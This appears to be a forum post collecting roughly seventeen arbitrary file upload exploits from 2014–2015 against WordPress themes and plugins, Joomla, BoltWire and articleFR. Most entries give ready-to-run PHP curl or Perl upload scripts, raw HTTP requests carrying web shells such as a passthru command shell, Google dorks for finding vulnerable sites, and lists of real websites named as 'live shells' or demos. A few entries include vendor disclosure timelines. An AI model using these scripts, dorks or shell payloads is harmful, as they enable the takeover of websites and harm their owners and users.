توییت
2014-2015 [align=center]Wordpress Frontend Upload Plugin - Arbitrary File Upload Vulnerability[/align][align=center]
[/align]
کد:
# Exploit Title: Frontend Upload Wordpress Plugin - File Arbitrary Upload # Date: 10/02/2014 # Author: Daniel Godoy # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Software: Frontend Upload # http://codecanyon.net/item/frontend-upload/6076410?WT.ac=solid_search_item&WT.seg_1=solid_search_item&WT.z_author=gtPlugins # Tested on: Linux [Comment]Greetz: Ariel Orellana, TrustedBSD, Sunplace www.remoteexecution.net www.remoteexcution.com.ar [PoC] you can upload files with php extension. Example: c99.php, shell.gif.php, etc... http://localhost/wp-content/uploads/feuGT_uploads/feuGT_1790_43000000_948109840.php ------------------------- Correo enviado por medio de MailMonstruo - www.mailmonstruo.com
کد:
#Title : Wordpress Themify Arbitrary File Upload Vulnerability
#Author : Jje Incovers
#Date : 31/03/2014
#Category : Web Applications
#Type : TXT, PHP, HTML, HTM, ASP, Etc.
#Vendor : http://themify.me/
#Download : http://themify.me/themes
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : File Upload
#Scanning Theme : [ Flatshop, Magazine , Flat Flat , Parallax , Bold, Metro , Pinshop , Agency , Slide , Postline , Fullscreen , Pinboard , Shopo , Minshop , Notes , ShopDock , PhotoTouch , Basic , Responz , Simfo , Grido , Tisa , Suco , Elemin , Folo , Funki , Minblr , iTheme2 , Newsy , Wumblr , Rezo , Photobox , Edmin , Koi , Bizco , ThemeMin , Wigi , Blogfolio , Sidepane , Bloggie ]
#Dork :
inurl:"/wp-content/themes/Elemin/"
inurl:"/wp-content/themes/Bloggie/"
inurl:"/wp-content/themes/Tisa/"
inurl:"/wp-content/themes/Funki/"
inurl:"/wp-content/themes/Pinboard/"
inurl:"/wp-content/themes/FOlo/"
inurl:"/wp-content/themes/grido/"
inurl:"/wp-content/themes/Suco/"
inurl:"/wp-content/themes/iThemes2/"
Arbitrary File Upload
Exploit : /wp-content/themes/select a theme/themify/themify-ajax.php
Example :
Elemin theme :
http://yourtarget.com/wp-content/themes/elemin/themify/themify-ajax.php
Script :
<?php
$uploadfile="inc0vers.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://yourtarget.com/wp-content/themes/select a theme/uploads/your file
Example :
Elemin theme :
http://yourtarget.com/wp-content/themes/elemin/uploads/inc0vers.php
Note :
Change theme in the script equate with your dork !!
کد:
Google Dork => inurl:/wp-content/plugins/image-symlinks/
Usage info:
=> Exploit Info :
The attacker can uplaod file/shell.php
("php") // Allowed file extensions
"/uploadify/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#=> Exploit :
<?php
$uploadfile="Bruno.php";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/image-symlinks/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/image-symlinks/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wp-content/image-symlinks/uploadify/random_name.php
<?php
phpinfo();
?>
====================================
Examples : ( Live Shells )
1 - http://www.scuboutique.com/wp-content/uploads/image-symlinks/uploadify/hun.php
2- http://datadriven.info/wp-content/uploads/image-symlinks/uploadify/hun.php
3- http://www.inlan.fr//wp-content/uploads/image-symlinks/uploadify/hun.php
کد:
Vulnerability in BoltWire, which can be exploited to execute arbitrary PHP code on the target system and gain complete control over vulnerable web application. 1) Unrestricted Upload of File with Dangerous Type in BoltWire: CVE-2014-4169 The vulnerability exists due to insufficient validation of the filename when uploading files in "/index.php" script. A remote authenticated attacker can upload arbitrary file with ".txt" extension and rename it into ".php" using a specially crafted HTTP POST request. Successful exploitation of the vulnerability requires valid user credentials, but registration is open by default to anyone. The vulnerability allows execution of arbitrary PHP code with privileges of the webserver and can lead to complete compromise of the website. The following dump of the HTTP POST request illustrates the upload of the file named "file.txt" and its renaming into "file.php", with contents, which allows execution of arbitrary system commands: POST /index.php?p=action.upload HTTP/1.1 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------312591666129281 Content-Length: 538 -----------------------------312591666129281 Content-Disposition: form-data; name="boltkey" 9867614 -----------------------------312591666129281 Content -Disposition: form-data; name="upload"; filename="file.txt" Content-Type: text/plain <? passthru($_GET['cmd']); ?> ----------------------------- 312591666129281 Content-Disposition: form-data; name="filename" file.php -----------------------------312591666129281 Conte nt-Disposition: form-data; name="submit" UPLOAD -----------------------------312591666129281-- The uploaded file will be accessible using the following URL: http://[host]/files/file.php?cmd=ls Solution: Update to BoltWire 4.11 More Information: http://www.boltwire.com/index.php?p=downloads
کد:
Exploit Title : WordPress Theme Konzept Arbitrary File Upload Vulnerability
Exploit Author : NULL_Pointer
Contact : https://www.facebook.com/xenith.gianni
Date : 19/09/2014
Vendor Homepage : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/konzept
Version: 1.0
Google Dork : inurl:/wp-content/themes/konzept/
Tested on : Linux, Windows 7
--------------------------------------------------------------
WordPress Theme Konzept suffers from Arbitrary File Upload Vulnerability.
Exploit :
<?php
$url = "http://127.0.0.1"; // put URL Here
$post = array
(
"file" => "@null_pointer.jpg",
"name" => "null_pointer.php"
);
$ch = curl_init ("$url/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Shell Path : http://127.0.0.1/wp-content/themes/konzept/includes/uploadify/uploads/null_pointer.php
Prof Video : http://www.youtube.com/watch?v=g7RaR3bCMag
Demo Sites :
http://www.ladepro.fr
http://getawayproductions.fr
http://www.victor-remere.fr
http://www.biceps-graphicdesign.fr
کد:
#Vulnerability title: Arbitrary File Upload in articleFR CMS 3.0.5 #Product: articleFR CMS #Vendor: http://freereprintables.com #Affected version: version 3.0.5 #Download link: https://github.com/articlefr/articleFR #Fixed version: N/A #Author: Tran Dinh Tien ([email protected]) & ITAS Team (www.itas.vn) ::DESCRITION:: - Vulnerabilities related to the upload of unexpected file types is unique in that the upload should quickly reject a file if it does not have a specific extension. Additionally, this is different from uploading malicious files in that in most cases an incorrect file format may not by it self be inherently "malicious" but may be detrimental to the saved data. - The application may be expecting only certain file types to be uploaded for processing, such as mpeg4, ogv, ogg, 3gp, webm, gif, mkv, flv, drc, mng, avi,... files. The application may not validate the uploaded file by extension (for low assurance file validation) or content (high assurance file validation). ::PROOF OF CONCEPT:: - REQUEST: POST /articlefr/dashboard/videouploader.php HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://target.org/articlefr/dashboard/videos/fileupload/ Content-Length: 414 Content-Type: multipart/form-data; boundary=---------------------------277651700022570 Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -----------------------------277651700022570 Content-Disposition: form-data; name="myVideo"; filename="img.php" Content-Type: image/gif <?php phpinfo(); ?> -----------------------------277651700022570 Content-Disposition: form-data; name="" undefined -----------------------------277651700022570 Content-Disposition: form-data; name="" undefined -----------------------------277651700022570-- - RESPONSE: HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 03:10:30 GMT Server: Apache/2.2.15 (Red Hat) Content-Type: text/html Vary: Accept-Encoding Accept-Ranges: none Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 36 [String_Random].php - Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php - Vulnerable file: articlefr/dashboard/videouploader.php - Vulnerable code: <?php $output_dir = dirname(dirname(__FILE__)) . "/videos_repository/"; if(isset($_FILES["myVideo"])) { $ret = array(); $error =$_FILES["myVideo"]["error"]; if(!is_array($_FILES["myVideo"]["name"])) { $fileName = $_FILES["myVideo"]["name"]; $extension = pathinfo($fileName, PATHINFO_EXTENSION); $newFileName = md5(uniqid() . $fileName) . '.' . $extension; move_uploaded_file($_FILES["myVideo"]["tmp_name"], $output_dir.$newFileName); $ret[]= $newFileName; } echo $newFileName; } ?> ::DISCLOSURE:: + 12/09/2014: Contact to vendor - vendor did not reply + 12/11/2014: Contact to vendor - vendor did not reply + 12/22/2014: Contact to vendor - vendor replied + 12/23/2014: Send the detail vulnerability to vendor - vendor did not reply + 01/21/2015: Public information ::REFERENCE:: - http://www.itas.vn/news/itas-team-phat-hien-lo-hong-arbitrarily-file-upload-trong-articlefr-cms-71.html
کد:
######################################################### # Exploit Title: Wordpress Theme Holding Pattern Arbitrary File Upload Vulnerability # Source: https://github.com/heyjoeb/fenix/tree/master/wp-content/themes/holding_pattern # Author: terrorist # Email: [email protected] # Team: GHC - Georgian Hacking Community # Category: webapps/php # Google dork: inurl:wp-content/themes/holding_pattern ######################################################### # Vulnerable upload-file.php <?php //Upload Security $upload_security = md5($_SERVER['SERVER_ADDR']); $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/"; if( $_FILES[$upload_security] ): $file = $_FILES[$upload_security]; $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name']))))); if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)): if(chmod($file,0777)): echo "success"; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; endif; ?> # Exploit <?php $uploadfile="shell.php"; $target = "http://target.com"; $domain = explode("/", $target); $server_addr = gethostbyname($domain[2]); $ch = curl_init($target."/wp-content/themes/holding_pattern/admin/upload-file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_VERBOSE, false); curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.'))); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # File path: http://target/wp-content/themes/holding_pattern/admin/shell.php
کد:
######################################################### # Exploit Title: Wordpress Theme Charity Arbitrary File Upload Vulnerability # Source: https://github.com/UpThemes/Charity-Theme # Author: terrorist # Email: [email protected] # Team: GHC - Georgian Hacking Community # Category: webapps/php # Google dork: inurl:wp-content/themes/charity ######################################################### # Vulnerable upload-file.php <?php //Upload Security $upload_security = md5($_SERVER['SERVER_ADDR']); $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/"; if( $_FILES[$upload_security] ): $file = $_FILES[$upload_security]; $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name']))))); if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)): if(chmod($file,0777)): echo "success"; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; endif; ?> # Exploit <?php $uploadfile="shell.php"; $target = "http://target.com"; $domain = explode("/", $target); $server_addr = gethostbyname($domain[2]); $ch = curl_init($target."/wp-content/themes/charity/admin/upload-file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_VERBOSE, false); curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.'))); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # File path: http://target/wp-content/themes/charity/admin/shell.php
کد:
######################################################### # Exploit Title: Wordpress Theme SimpleCart Arbitrary File Upload Vulnerability # Source: https://github.com/UpThemes/SimpleCart-Theme # Author: terrorist # Email: [email protected] # Team: GHC - Georgian Hacking Community # Category: webapps/php # Google dork: inurl:wp-content/themes/simpleCart ######################################################### # Vulnerable upload-file.php <?php //Upload Security $upload_security = md5($_SERVER['SERVER_ADDR']); $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/"; if( $_FILES[$upload_security] ): $file = $_FILES[$upload_security]; $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name']))))); if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)): if(chmod($file,0777)): echo "success"; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; endif; ?> # Exploit <?php $uploadfile="shell.php"; $target = "http://target.com"; $domain = explode("/", $target); $server_addr = gethostbyname($domain[2]); $ch = curl_init($target."/wp-content/themes/simpleCart/admin/upload-file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_VERBOSE, false); curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.'))); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # File path: http://target/wp-content/themes/simpleCart/admin/shell.php
کد:
######################################################### # Exploit Title: Wordpress Theme Micro Arbitrary File Upload Vulnerability # Source: https://github.com/UpThemes/Micro-Theme # Author: terrorist # Email: [email protected] # Team: GHC - Georgian Hacking Community # Category: webapps/php # Google dork: inurl:wp-content/themes/micro ######################################################### # Vulnerable upload-file.php <?php //Upload Security $upload_security = md5($_SERVER['SERVER_ADDR']); $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/"; if( $_FILES[$upload_security] ): $file = $_FILES[$upload_security]; $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name']))))); if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)): if(chmod($file,0777)): echo "success"; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; endif; ?> # Exploit <?php $uploadfile="shell.php"; $target = "http://target.com"; $domain = explode("/", $target); $server_addr = gethostbyname($domain[2]); $ch = curl_init($target."/wp-content/themes/micro/admin/upload-file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_VERBOSE, false); curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.'))); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # File path: http://target/wp-content/themes/micro/admin/shell.php
کد:
######################################################### # Exploit Title: Wordpress Theme Evo Arbitrary File Upload Vulnerability # Source: https://github.com/UpThemes/Evo-Theme # Author: terrorist # Email: [email protected] # Team: GHC - Georgian Hacking Community # Category: webapps/php # Google dork: inurl:wp-content/themes/evo ######################################################### # Vulnerable upload-file.php <?php //Upload Security $upload_security = md5($_SERVER['SERVER_ADDR']); $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/"; if( $_FILES[$upload_security] ): $file = $_FILES[$upload_security]; $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name']))))); if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)): if(chmod($file,0777)): echo "success"; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; endif; ?> # Exploit <?php $uploadfile="shell.php"; $target = "http://target.com"; $domain = explode("/", $target); $server_addr = gethostbyname($domain[2]); $ch = curl_init($target."/wp-content/themes/evo/admin/upload-file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_VERBOSE, false); curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.'))); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # File path: http://target/wp-content/themes/evo/admin/shell.php
کد:
######################################################### # Exploit Title: Wordpress Theme Gallery pro Arbitrary File Upload Vulnerability # Source: https://github.com/UpThemes/Gallery-Pro-Theme # Author: terrorist # Email: [email protected] # Team: GHC - Georgian Hacking Community # Category: webapps/php # Google dork: inurl:wp-content/themes/gallery ######################################################### # Vulnerable upload-file.php <?php //Upload Security $upload_security = md5($_SERVER['SERVER_ADDR']); $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/"; if( $_FILES[$upload_security] ): $file = $_FILES[$upload_security]; $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name']))))); if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)): if(chmod($file,0777)): echo "success"; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; endif; ?> # Exploit <?php $uploadfile="shell.php"; $target = "http://target.com"; $domain = explode("/", $target); $server_addr = gethostbyname($domain[2]); $ch = curl_init($target."/wp-content/themes/gallery/admin/upload-file.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_VERBOSE, false); curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.'))); curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # File path: http://target/wp-content/themes/gallery/admin/shell.php
کد:
------------------------------------------------------------------------------
WordPress Fusion Theme Authenicated Arbitrary File Upload
------------------------------------------------------------------------------
[-] Theme Link:
https://wordpress.org/themes/fusion ( Over 334,000 Downloads )
http://digitalnature.ro/themes/fusion/
[-] Affected Version:
Version 3.1
[-] Vulnerability Description:
The vulnerable code is located in the /functions script:
//SHORTENED CODE
function fusion_options() {
if ( 'fusion_save' == $_REQUEST['action'] ) {
if ($_FILES["file-logo"]["type"]){
$directory = $uploadpath['basedir'].'/';
move_uploaded_file($_FILES["file-logo"]["tmp_name"],
$directory . $_FILES["file-logo"]["name"]);
update_option('fusion_logoimage', $uploadpath['baseurl']. "/".
$_FILES["file-logo"]["name"]);
}
}
add_action('admin_menu', 'fusion_options');
then function fusion_options can be called by LOGGED IN USERS and executed
which leads to uploading any file on attacked server which may cause the
site full take over.
[-] Proof of Concept:
<form action="http://localhost/x/wordpress/wp-admin/admin.php"
method="post" enctype="multipart/form-data">
<input type="file" name="file-logo" />
<input type="hidden" name="action" value="fusion_save" />
<button type="submit" >Upload</button>
</form>
کد:
######################################################### # Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability # Source: https://github.com/UpThemes/DesignFolio-Plus # Author: CrashBandicot # Email: [email protected] # Category: webapps/php # Google dork: inurl:wp-content/themes/DesignFolio-Plus ######################################################### Vulnerable File : upload-file.php <?php //Upload Security $upload_security = md5($_SERVER['SERVER_ADDR']); $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/"; if( $_FILES[$upload_security] ): $file = $_FILES[$upload_security]; $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name']))))); if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)): if(chmod($file,0777)): echo "success"; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; endif; ?> Exploit #!/usr/bin/perl use Digest::MD5 qw(md5 md5_hex); use MIME::Base64; use IO::Socket; use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\n\t ! *** # ^_^ # *** !\n\t :p\n\n"; $use = "\n\t [!] ./$0 127.0.0.1 backdoor.php"; ($target ,$file) = @ARGV; die "$use" unless $ARGV[0] && $ARGV[1]; if($target =~ /http:\/\/(.*)\//){ $target = $1; } elsif($target =~ /http:\/\/(.*)/){ $target = $1; } elsif($target =~ /https:\/\/(.*)\//){ $target = $1; } elsif($target =~ /https:\/\/(.*)/){ $target = $1; } my $addr = inet_ntoa((gethostbyname($target))[4]); my $digest = md5_hex($addr); my $dir = encode_base64('../../../../'); my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},); $pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]); if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; } __END__ # File path: http://target/shell.php
کد:
###################################################################### # Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload # Google Dork: inurl:com_simplephotogallery # Date: 10.03.2015 # Exploit Author: CrashBandicot @DosPerl # My Github: github.com/CCrashBandicot # Vendor Homepage: https://www.apptha.com/ # Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery # Version: 1 # Tested on: Windows ###################################################################### # Vulnerable File : uploadFile.php # Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php 20. $fieldName = 'uploadfile'; 87. $fileTemp = $_FILES[$fieldName]['tmp_name']; 94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName; 96. if(! move_uploaded_file($fileTemp, $uploadPath)) # Exploit : <form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" > <input type="file" name="uploadfile"><br> <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br> <input type="submit" name="Submit" value="Pwn!"> </form> # Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php) # Shell Path : http://localhost/backdoor__[RandomString].php # Demo : http://www.aphroditesvision.com/administrator/components/com_simplephotogallery/lib/uploadFile.php # http://www.ffessm91.fr/administrator/components/com_simplephotogallery/lib/uploadFile.php # http://freros-dazur.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
کد:
#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2825 #Author: Tran Dinh Tien ([email protected]) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: targer.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026 Content-Length: 683 -----------------------------108989518220095255551617421026 Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/x-php <?php phpinfo(); ?> -----------------------------108989518220095255551617421026 Content-Disposition: form-data; name="action" upload_ad_image -----------------------------108989518220095255551617421026— + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: from line 303 to 314 case 'sam_ajax_upload_ad_image': if(isset($_POST['path'])) { $uploadDir = $_POST['path']; $file = $uploadDir . basename($_FILES['uploadfile']['name']); if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) { $out = array('status' => "success"); } else { $out = array('status' => "error"); } } break; + REFERENCE: - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en - https://www.youtube.com/watch?v=8IU9EtUTkxI
کد:
######################################################################
# Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload
# Google Dork: inurl:/plugins/php-event-calendar/
# Date: 02.04.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Source Plugin: https://wordpress.org/plugins/php-event-calendar/
# Vendor HomePage: http://phpeventcalendar.com/
# Version: 1.5
# Tested on: MSwin
######################################################################
# Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php
# Vulnerable File : uploadify.php
<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
$targetFolder = $_POST['targetFolder']; // wp upload directory
$dir = str_replace('\\','/',dirname(__FILE__));
//$verifyToken = md5('unique_salt' . $_POST['timestamp']);
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
//$targetPath = $dir.$targetFolder;
$targetPath = $targetFolder;
$fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
$targetFile = rtrim($targetPath,'/') . '/' . $fileName;
// Validate the file type
$fileTypes = array('jpg','jpeg','gif','png'); // File extensions
$fileParts = pathinfo($_FILES['Filedata']['name']);
if (in_array($fileParts['extension'],$fileTypes)) {
move_uploaded_file($tempFile,$targetFile);
echo '1';
} else {
echo 'Invalid file type.';
}
}
?>
# Exploit
#!/usr/bin/perl
use LWP::UserAgent;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\t +===================================================\n";
print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n";
print "\t | Author: CrashBandicot\n";
print "\t +===================================================\n\n";
die "usage : perl $0 backdoor.php.gif" unless $ARGV[0];
$file = $ARGV[0];
my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content;
if($ch = ~/1/) {
print "\n [+] File Uploaded !";
} else { print "\n [-] Target not Vuln"; }
__END__
# Path Shell : http://localhost/0day_backdoor.php.gif
کد:
###################### # Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip # Date : 2015-03-14 # Tested on : Linux BackBox 4.0 / curl 7.35.0 ###################### # Description: Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving. This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow. ###################### # Location : http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php ###################### # PoC: curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php # Backdoor Location: http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php ###################### # Vulnerability Disclosure Timeline: 2015-03-14: Discovered vulnerability 2015-04-03: Vendor Notification 2015-04-03: Vendor Response/Feedback 2015-04-04: Vendor Fix/Patch (2.5.3) 2014-04-04: Public Disclosure
[/align]